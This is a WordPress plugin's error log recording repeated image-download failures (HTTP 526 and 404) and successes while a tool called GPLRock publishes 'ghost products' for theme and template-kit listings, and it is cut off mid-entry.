GPLRock: Image download failed for product scuola-language-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:18 UTC] GPLRock: Image download failed for product scuola-language-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scuola---language-school-wordpress-theme-13477.webp for product scuola-language-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:21 UTC] GPLRock: Image download failed for product scuola-language-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:23 UTC] GPLRock: Image download failed for product scuola-language-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scuola---language-school-wordpress-theme-13477.webp for product scuola-language-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:25 UTC] GPLRock WARNING: Image download failed for product scuola-language-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/scuola---language-school-wordpress-theme-13477.webp [06-Apr-2026 08:50:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scuola-language-school-wordpress-theme [06-Apr-2026 08:50:25 UTC] GPLRock: Image download failed for product moonte-jewelry-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:27 UTC] GPLRock: Image download failed for product moonte-jewelry-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moonte--jewelry-store-woocommerce-wordpress-theme-25544.webp for product moonte-jewelry-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:29 UTC] GPLRock: Image download failed for product moonte-jewelry-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:31 UTC] GPLRock: Image download failed for product moonte-jewelry-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moonte--jewelry-store-woocommerce-wordpress-theme-25544.webp for product moonte-jewelry-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:33 UTC] GPLRock WARNING: Image download failed for product moonte-jewelry-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/moonte--jewelry-store-woocommerce-wordpress-theme-25544.webp [06-Apr-2026 08:50:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moonte-jewelry-store-woocommerce-wordpress-theme [06-Apr-2026 08:50:34 UTC] GPLRock: Image download failed for product flavia-kids-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:36 UTC] GPLRock: Image download failed for product flavia-kids-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flavia---kids-shop-woocommerce-wordpress-theme-26464.webp for product flavia-kids-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:38 UTC] GPLRock: Image download failed for product flavia-kids-shop-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:40 UTC] GPLRock: Image download failed for product flavia-kids-shop-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flavia---kids-shop-woocommerce-wordpress-theme-26464.webp for product flavia-kids-shop-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:42 UTC] GPLRock WARNING: Image download failed for product flavia-kids-shop-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/flavia---kids-shop-woocommerce-wordpress-theme-26464.webp [06-Apr-2026 08:50:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flavia-kids-shop-woocommerce-wordpress-theme [06-Apr-2026 08:50:42 UTC] GPLRock: Image download failed for product creator-wordpress-theme-for-handmade-artisans (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:44 UTC] GPLRock: Image download failed for product creator-wordpress-theme-for-handmade-artisans (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creator---wordpress-theme-for-handmade-artisans-22349.webp for product creator-wordpress-theme-for-handmade-artisans after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:46 UTC] GPLRock: Image download failed for product creator-wordpress-theme-for-handmade-artisans (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:49 UTC] GPLRock: Image download failed for product creator-wordpress-theme-for-handmade-artisans (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/creator---wordpress-theme-for-handmade-artisans-22349.webp for product creator-wordpress-theme-for-handmade-artisans after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:51 UTC] GPLRock WARNING: Image download failed for product creator-wordpress-theme-for-handmade-artisans. URL: https://meldwp.com/wp-content/uploads/creator---wordpress-theme-for-handmade-artisans-22349.webp [06-Apr-2026 08:50:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: creator-wordpress-theme-for-handmade-artisans [06-Apr-2026 08:50:51 UTC] GPLRock: Image download failed for product alavion-private-jet-charters-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:53 UTC] GPLRock: Image download failed for product alavion-private-jet-charters-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alavion---private-jet-charters-wordpress-theme-1136.webp for product alavion-private-jet-charters-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:55 UTC] GPLRock: Image download failed for product alavion-private-jet-charters-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:57 UTC] GPLRock: Image download failed for product alavion-private-jet-charters-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:50:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alavion---private-jet-charters-wordpress-theme-1136.webp for product alavion-private-jet-charters-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:50:59 UTC] GPLRock WARNING: Image download failed for product alavion-private-jet-charters-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alavion---private-jet-charters-wordpress-theme-1136.webp [06-Apr-2026 08:50:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alavion-private-jet-charters-wordpress-theme [06-Apr-2026 08:50:59 UTC] GPLRock: Image download failed for product regalia-artist-portfolio-art-gallery-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:02 UTC] GPLRock: Image download failed for product regalia-artist-portfolio-art-gallery-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/regalia---artist-portfolio-art-gallery-theme-21893.webp for product regalia-artist-portfolio-art-gallery-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:04 UTC] GPLRock: Image download failed for product regalia-artist-portfolio-art-gallery-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:06 UTC] GPLRock: Image download failed for product regalia-artist-portfolio-art-gallery-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/regalia---artist-portfolio-art-gallery-theme-21893.webp for product regalia-artist-portfolio-art-gallery-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:08 UTC] GPLRock WARNING: Image download failed for product regalia-artist-portfolio-art-gallery-theme. URL: https://meldwp.com/wp-content/uploads/regalia---artist-portfolio-art-gallery-theme-21893.webp [06-Apr-2026 08:51:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: regalia-artist-portfolio-art-gallery-theme [06-Apr-2026 08:51:08 UTC] GPLRock: Image download failed for product gustavo-mexican-grill-bar-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:10 UTC] GPLRock: Image download failed for product gustavo-mexican-grill-bar-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gustavo--mexican-grill-bar--restaurant-wordpress-theme-26698.webp for product gustavo-mexican-grill-bar-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:12 UTC] GPLRock: Image download failed for product gustavo-mexican-grill-bar-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:14 UTC] GPLRock: Image download failed for product gustavo-mexican-grill-bar-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gustavo--mexican-grill-bar--restaurant-wordpress-theme-26698.webp for product gustavo-mexican-grill-bar-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:17 UTC] GPLRock WARNING: Image download failed for product gustavo-mexican-grill-bar-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gustavo--mexican-grill-bar--restaurant-wordpress-theme-26698.webp [06-Apr-2026 08:51:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gustavo-mexican-grill-bar-restaurant-wordpress-theme [06-Apr-2026 08:51:17 UTC] GPLRock: Image download failed for product quta-a-wordpress-blog-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:19 UTC] GPLRock: Image download failed for product quta-a-wordpress-blog-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quta---a-wordpress-blog--shop-theme-12873.webp for product quta-a-wordpress-blog-shop-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:21 UTC] GPLRock: Image download failed for product quta-a-wordpress-blog-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:23 UTC] GPLRock: Image download failed for product quta-a-wordpress-blog-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:51:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quta---a-wordpress-blog--shop-theme-12873.webp for product quta-a-wordpress-blog-shop-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:51:25 UTC] GPLRock WARNING: Image download failed for product quta-a-wordpress-blog-shop-theme. URL: https://meldwp.com/wp-content/uploads/quta---a-wordpress-blog--shop-theme-12873.webp [06-Apr-2026 08:51:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quta-a-wordpress-blog-shop-theme [06-Apr-2026 08:51:58 UTC] GPLRock: Image downloaded successfully for product biznext-corporate-business-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08961efb.webp [06-Apr-2026 08:51:58 UTC] GPLRock: Using pre-downloaded image for product biznext-corporate-business-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08961efb.webp [06-Apr-2026 08:51:58 UTC] GPLRock: Ghost product published with image - Product ID: biznext-corporate-business-template-kit [06-Apr-2026 08:52:00 UTC] GPLRock: Image downloaded successfully for product bizkeep-bookkeeping-accounting-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8a16bcf.webp [06-Apr-2026 08:52:00 UTC] GPLRock: Using pre-downloaded image for product bizkeep-bookkeeping-accounting-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8a16bcf.webp [06-Apr-2026 08:52:00 UTC] GPLRock: Ghost product published with image - Product ID: bizkeep-bookkeeping-accounting-service-elementor-template-kit [06-Apr-2026 08:52:01 UTC] GPLRock: Image downloaded successfully for product bizgue-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99fc67d.webp [06-Apr-2026 08:52:01 UTC] GPLRock: Using pre-downloaded image for product bizgue-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d99fc67d.webp [06-Apr-2026 08:52:01 UTC] GPLRock: Ghost product published with image - Product ID: bizgue-business-elementor-template-kit [06-Apr-2026 08:52:03 UTC] GPLRock: Image downloaded successfully for product bitzcoin-crypto-exchange-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74ca7dd8.webp [06-Apr-2026 08:52:03 UTC] GPLRock: Using pre-downloaded image for product bitzcoin-crypto-exchange-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-74ca7dd8.webp [06-Apr-2026 08:52:03 UTC] GPLRock: Ghost product published with image - Product ID: bitzcoin-crypto-exchange-elementor-template-kit [06-Apr-2026 08:52:04 UTC] GPLRock: Image downloaded successfully for product bitexco-creative-interior-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-090ecbe1.webp [06-Apr-2026 08:52:04 UTC] GPLRock: Using pre-downloaded image for product bitexco-creative-interior-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-090ecbe1.webp [06-Apr-2026 08:52:04 UTC] GPLRock: Ghost product published with image - Product ID: bitexco-creative-interior-elementor-template-kit [06-Apr-2026 08:52:06 UTC] GPLRock: Image downloaded successfully for product bitco-bitcoin-cryptocurrency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f42fdca2.webp [06-Apr-2026 08:52:06 UTC] GPLRock: Using pre-downloaded image for product bitco-bitcoin-cryptocurrency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f42fdca2.webp [06-Apr-2026 08:52:06 UTC] GPLRock: Ghost product published with image - Product ID: bitco-bitcoin-cryptocurrency-elementor-template-kit [06-Apr-2026 08:52:07 UTC] GPLRock: Image downloaded successfully for product birru-simple-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85a6049f.webp [06-Apr-2026 08:52:07 UTC] GPLRock: Using pre-downloaded image for product birru-simple-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-85a6049f.webp [06-Apr-2026 08:52:07 UTC] GPLRock: Ghost product published with image - Product ID: birru-simple-portfolio-elementor-template-kit [06-Apr-2026 08:52:08 UTC] GPLRock: Image downloaded successfully for product bioxin-single-freelancer-cv-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eeac0fc.webp [06-Apr-2026 08:52:08 UTC] GPLRock: Using pre-downloaded image for product bioxin-single-freelancer-cv-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eeac0fc.webp [06-Apr-2026 08:52:08 UTC] GPLRock: Ghost product published with image - Product ID: bioxin-single-freelancer-cv-portfolio-elementor-template-kit [06-Apr-2026 08:52:10 UTC] GPLRock: Image downloaded successfully for product bilis-agency-landing-page-elementor-block-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42dc46f5.webp [06-Apr-2026 08:52:10 UTC] GPLRock: Using pre-downloaded image for product bilis-agency-landing-page-elementor-block-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42dc46f5.webp [06-Apr-2026 08:52:10 UTC] GPLRock: Ghost product published with image - Product ID: bilis-agency-landing-page-elementor-block-kit [06-Apr-2026 08:52:11 UTC] GPLRock: Image downloaded successfully for product bikepro-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3de8dddc.webp [06-Apr-2026 08:52:11 UTC] GPLRock: Using pre-downloaded image for product bikepro-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3de8dddc.webp [06-Apr-2026 08:52:11 UTC] GPLRock: Ghost product published with image - Product ID: bikepro-woocommerce-elementor-template-kit [06-Apr-2026 08:53:34 UTC] GPLRock: Image downloaded successfully for product stripe-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b378eb7.jpg [06-Apr-2026 08:53:34 UTC] GPLRock: Using pre-downloaded image for product stripe-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b378eb7.jpg [06-Apr-2026 08:53:34 UTC] GPLRock: Ghost product published with image - Product ID: stripe-for-woocommerce [06-Apr-2026 08:53:35 UTC] GPLRock: Image downloaded successfully for product wpcast-audio-podcast-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab2d9dfc.jpg [06-Apr-2026 08:53:35 UTC] GPLRock: Using pre-downloaded image for product wpcast-audio-podcast-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ab2d9dfc.jpg [06-Apr-2026 08:53:35 UTC] GPLRock: Ghost product published with image - Product ID: wpcast-audio-podcast-wordpress-theme [06-Apr-2026 08:53:38 UTC] GPLRock: Image download failed for product hanio-sweets-pastry-shop-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:53:42 UTC] GPLRock: Image download failed for product hanio-sweets-pastry-shop-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:53:47 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/Hanio-Sweets-Pastry-Shop-WordPress-Theme.jpg for product hanio-sweets-pastry-shop-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 08:53:49 UTC] GPLRock: Image download failed for product hanio-sweets-pastry-shop-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:53:53 UTC] GPLRock: Image download failed for product hanio-sweets-pastry-shop-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:53:57 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/Hanio-Sweets-Pastry-Shop-WordPress-Theme.jpg for product hanio-sweets-pastry-shop-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 08:53:57 UTC] GPLRock WARNING: Image download failed for product hanio-sweets-pastry-shop-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/11/Hanio-Sweets-Pastry-Shop-WordPress-Theme.jpg [06-Apr-2026 08:53:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hanio-sweets-pastry-shop-wordpress-theme [06-Apr-2026 08:53:58 UTC] GPLRock: Image downloaded successfully for product apuslisting-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aec19600.avif [06-Apr-2026 08:53:58 UTC] GPLRock: Using pre-downloaded image for product apuslisting-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-aec19600.avif [06-Apr-2026 08:53:58 UTC] GPLRock: Ghost product published with image - Product ID: apuslisting-directory-listing-wordpress-theme [06-Apr-2026 08:54:00 UTC] GPLRock: Image downloaded successfully for product aventura-travel-tour-booking-system-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f3a1a86.jpg [06-Apr-2026 08:54:00 UTC] GPLRock: Using pre-downloaded image for product aventura-travel-tour-booking-system-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f3a1a86.jpg [06-Apr-2026 08:54:00 UTC] GPLRock: Ghost product published with image - Product ID: aventura-travel-tour-booking-system-wordpress-theme [06-Apr-2026 08:54:01 UTC] GPLRock: Image downloaded successfully for product ryse-seo-digital-marketing-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67edfa48.avif [06-Apr-2026 08:54:01 UTC] GPLRock: Using pre-downloaded image for product ryse-seo-digital-marketing-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-67edfa48.avif [06-Apr-2026 08:54:01 UTC] GPLRock: Ghost product published with image - Product ID: ryse-seo-digital-marketing-theme [06-Apr-2026 08:54:03 UTC] GPLRock: Image downloaded successfully for product everest-google-places-reviews (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a043fcf.jpg [06-Apr-2026 08:54:03 UTC] GPLRock: Using pre-downloaded image for product everest-google-places-reviews: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0a043fcf.jpg [06-Apr-2026 08:54:03 UTC] GPLRock: Ghost product published with image - Product ID: everest-google-places-reviews [06-Apr-2026 08:54:06 UTC] GPLRock: Image download failed for product couponxl-coupons-deals-discounts-wp-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:54:10 UTC] GPLRock: Image download failed for product couponxl-coupons-deals-discounts-wp-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:54:14 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/CouponXL-Coupons-Deals-Discounts-WP-Theme.jpg for product couponxl-coupons-deals-discounts-wp-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 08:54:16 UTC] GPLRock: Image download failed for product couponxl-coupons-deals-discounts-wp-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:54:20 UTC] GPLRock: Image download failed for product couponxl-coupons-deals-discounts-wp-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 08:54:24 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/CouponXL-Coupons-Deals-Discounts-WP-Theme.jpg for product couponxl-coupons-deals-discounts-wp-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 08:54:24 UTC] GPLRock WARNING: Image download failed for product couponxl-coupons-deals-discounts-wp-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/11/CouponXL-Coupons-Deals-Discounts-WP-Theme.jpg [06-Apr-2026 08:54:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: couponxl-coupons-deals-discounts-wp-theme [06-Apr-2026 08:54:26 UTC] GPLRock: Image downloaded successfully for product squadrone-drone-uav-business (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ddfd2ec.jpg [06-Apr-2026 08:54:26 UTC] GPLRock: Using pre-downloaded image for product squadrone-drone-uav-business: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ddfd2ec.jpg [06-Apr-2026 08:54:26 UTC] GPLRock: Ghost product published with image - Product ID: squadrone-drone-uav-business [06-Apr-2026 08:54:28 UTC] GPLRock: Image downloaded successfully for product riven-wordpress-theme-for-app-game-single-product-landing-page (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c0d4e62.jpg [06-Apr-2026 08:54:28 UTC] GPLRock: Using pre-downloaded image for product riven-wordpress-theme-for-app-game-single-product-landing-page: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8c0d4e62.jpg [06-Apr-2026 08:54:28 UTC] GPLRock: Ghost product published with image - Product ID: riven-wordpress-theme-for-app-game-single-product-landing-page [06-Apr-2026 08:54:58 UTC] GPLRock: Image download failed for product sasspark-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:00 UTC] GPLRock: Image download failed for product sasspark-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sasspark---startup-wordpress-theme-26132.webp for product sasspark-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:02 UTC] GPLRock: Image download failed for product sasspark-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:04 UTC] GPLRock: Image download failed for product sasspark-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sasspark---startup-wordpress-theme-26132.webp for product sasspark-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:06 UTC] GPLRock WARNING: Image download failed for product sasspark-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sasspark---startup-wordpress-theme-26132.webp [06-Apr-2026 08:55:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sasspark-startup-wordpress-theme [06-Apr-2026 08:55:06 UTC] GPLRock: Image download failed for product neue-a-simple-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:08 UTC] GPLRock: Image download failed for product neue-a-simple-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neue---a-simple-portfolio-theme-17712.webp for product neue-a-simple-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:11 UTC] GPLRock: Image download failed for product neue-a-simple-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:13 UTC] GPLRock: Image download failed for product neue-a-simple-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neue---a-simple-portfolio-theme-17712.webp for product neue-a-simple-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:15 UTC] GPLRock WARNING: Image download failed for product neue-a-simple-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/neue---a-simple-portfolio-theme-17712.webp [06-Apr-2026 08:55:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neue-a-simple-portfolio-theme [06-Apr-2026 08:55:15 UTC] GPLRock: Image download failed for product marlboro-woocommerce-responsive-fashion-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:17 UTC] GPLRock: Image download failed for product marlboro-woocommerce-responsive-fashion-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marlboro---woocommerce-responsive-fashion-theme-1472.webp for product marlboro-woocommerce-responsive-fashion-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:19 UTC] GPLRock: Image download failed for product marlboro-woocommerce-responsive-fashion-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:21 UTC] GPLRock: Image download failed for product marlboro-woocommerce-responsive-fashion-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:55:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marlboro---woocommerce-responsive-fashion-theme-1472.webp for product marlboro-woocommerce-responsive-fashion-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:55:23 UTC] GPLRock WARNING: Image download failed for product marlboro-woocommerce-responsive-fashion-theme. URL: https://meldwp.com/wp-content/uploads/marlboro---woocommerce-responsive-fashion-theme-1472.webp [06-Apr-2026 08:55:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marlboro-woocommerce-responsive-fashion-theme [06-Apr-2026 08:55:24 UTC] GPLRock: Image download failed for product swipy-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 